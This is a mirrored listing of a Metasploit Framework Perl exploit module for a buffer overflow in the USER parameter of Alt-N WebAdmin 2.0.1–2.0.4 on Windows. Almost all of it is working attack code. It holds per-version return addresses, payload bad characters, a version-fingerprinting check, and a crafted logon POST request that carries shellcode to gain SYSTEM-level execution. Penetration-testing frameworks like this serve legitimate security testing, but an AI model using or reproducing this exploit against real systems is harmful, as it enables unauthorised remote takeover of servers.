home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / altn_webadmin.pm < prev    next >
Encoding:
Perl POD Document  |  2006-06-30  |  4.2 KB  |  161 lines
  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::altn_webadmin;
  11. use base "Msf::Exploit";
  12. use strict;
  13. use Pex::Text;
  14.  
  15. my $advanced = { };
  16.  
  17. my $info =
  18.   {
  19.  
  20.     'Name'  => 'Alt-N WebAdmin USER Buffer Overflow',
  21.     'Version'  => '$Revision: 1.4 $',
  22.     'Authors' => [ 'y0 [at] w00t-shell.net', ],
  23.     'Arch'  => [ 'x86' ],
  24.     'OS'    => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003' ],
  25.     'Priv'  => 0,
  26.     
  27.     'AutoOpts'  => { 'EXITFUNC' => 'thread' },
  28.     'UserOpts'  => {
  29.         'RHOST' => [1, 'ADDR', 'The target address'],
  30.         'RPORT' => [1, 'PORT', 'The target port', 1000],
  31.         'SSL'   => [0, 'BOOL', 'Use SSL'],
  32.       },
  33.       
  34.     
  35.  
  36.     'Payload' =>
  37.       {
  38.         'Space'     => 830,
  39.         'BadChars'  => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
  40.         'Prepend'   => "\x81\xc4\xff\xef\xff\xff\x44",
  41.         'Keys'      => ['+ws2ord'],
  42.       },
  43.  
  44.     'Description'  => Pex::Text::Freeform(qq{
  45. Alt-N WebAdmin is prone to a buffer overflow condition. 
  46. This is due to insufficient bounds checking on the USER 
  47. parameter. Successful exploitation could result in code 
  48. execution with SYSTEM level privileges.
  49. }),
  50.  
  51.     'Refs'  =>
  52.       [
  53.           ['OSVDB', '2207'],
  54.         ['BID', '8024'],
  55.         ['NSS', '11771'],
  56.         ['MIL', '95'],
  57.       ],
  58.       
  59.     'Targets' =>
  60.       [
  61.         ['WebAdmin 2.0.4 Universal', 0x10074d9b], # 2.0.4 webAdmin.dll
  62.         ['WebAdmin 2.0.3 Universal', 0x10074b13], # 2.0.3 webAdmin.dll
  63.         ['WebAdmin 2.0.2 Universal', 0x10071e3b], # 2.0.2 webAdmin.dll
  64.         ['WebAdmin 2.0.1 Universal', 0x100543c2], # 2.0.1 webAdmin.dll
  65.  
  66.       ],
  67.     'Keys' => ['webadmin'],
  68.  
  69.     'DisclosureDate' => 'Jun 24 2003',
  70.   };
  71.  
  72. sub new {
  73.     my $class = shift;
  74.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  75.     return($self);
  76. }
  77.  
  78. sub Check {
  79.     my ($self) = @_;
  80.     my $target_host = $self->GetVar('RHOST');
  81.     my $target_port = $self->GetVar('RPORT');
  82.  
  83.     my $s = Msf::Socket::Tcp->new
  84.       (
  85.         'PeerAddr'  => $target_host,
  86.         'PeerPort'  => $target_port,
  87.         'LocalPort' => $self->GetVar('CPORT'),
  88.         'SSL'       => $self->GetVar('SSL'),
  89.       );
  90.     if ($s->IsError) {
  91.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  92.         return $self->CheckCode('Connect');
  93.     }
  94.  
  95.     $s->Send("GET / HTTP/1.0\r\n\r\n");
  96.     my $res = $s->Recv(-1, 20);
  97.     $s->Close();
  98.  
  99.     if ($res !~ /v2\.0\.[1-4]/) {
  100.         $self->PrintLine("[*] This server does not appear to be vulnerable.");
  101.         return $self->CheckCode('Safe');
  102.     }
  103.  
  104.     $self->PrintLine("[*] Vulnerable installation detected :-)");
  105.     return $self->CheckCode('Detected');
  106. }
  107.  
  108. sub Exploit
  109. {
  110.     my $self = shift;
  111.     my $target_host = $self->GetVar('RHOST');
  112.     my $target_port = $self->GetVar('RPORT');
  113.     my $target_idx  = $self->GetVar('TARGET');
  114.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  115.     my $target = $self->Targets->[$target_idx];
  116.  
  117.     if (! $self->InitNops(128)) {
  118.         $self->PrintLine("[*] Failed to initialize the nop module.");
  119.         return;
  120.     }
  121.  
  122.     my $splat = Pex::Text::AlphaNumText(168);
  123.  
  124.     my $credz =
  125.       "User=". $splat. pack('V', $target->[1]). $shellcode.
  126.       "&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In\r\n";
  127.  
  128.     my $sploit =
  129.       "POST /WebAdmin.DLL?View=Logon HTTP/1.1\r\n".
  130.       "Content-Type: application/x-www-form-urlencoded\r\n".
  131.       "Connection: close\r\n".
  132.       "Cookie: User=y0; Lang=en; Theme=standard\r\n".
  133.       "User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.31-grsec i686)\r\n".
  134.       "Host: $target_host\r\n".
  135.       "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png\r\n".
  136.       "Accept-Language: en\r\n".
  137.       "Accept-Charset: iso-8859-1,*,utf-8\r\n".
  138.       "Content-Length: ". length($credz). "\r\n\r\n".
  139.       $credz;
  140.  
  141.     $self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
  142.  
  143.     my $s = Msf::Socket::Tcp->new
  144.       (
  145.         'PeerAddr'  => $target_host,
  146.         'PeerPort'  => $target_port,
  147.         'LocalPort' => $self->GetVar('CPORT'),
  148.         'SSL'       => $self->GetVar('SSL'),
  149.       );
  150.     if ($s->IsError) {
  151.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  152.         return;
  153.     }
  154.  
  155.     $s->Send($sploit);
  156.     $self->Handler($s);
  157.     $s->Close();
  158.     return;
  159. }
  160.  
  161.